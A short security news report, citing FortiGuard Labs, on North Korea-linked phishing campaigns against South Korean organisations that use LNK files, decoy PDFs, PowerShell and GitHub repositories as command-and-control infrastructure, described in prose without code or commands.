NORTH Korea-linked threat actors are using phishing LNK files and GitHub as C2 servers to target South Korean organisations, with attacks starting from phishing emails that drop a decoy PDF and a PowerShell script.
According to FortiGuard Labs, the researchers detected a series of LNK files targeting South Korea that use a multi-stage scripting process and leverage GitHub as C2 infrastructure to evade detection, with older variants dating back to 2024 and metadata that aided tracking of similar attacks distributing XenoRAT. The latest campaigns embed decoding functions and encoded payloads directly in the LNK files, remove identifying metadata, and drop a decoy PDF while the malicious script executes.
The PowerShell component collects system details and communicates with GitHub via hidden repositories, using scheduled tasks to maintain persistence and periodically pull commands from the C2. The operation also relies on multiple GitHub accounts to manage activity, and a keep-alive script uploads network logs to GitHub to enable real-time monitoring and further exploitation.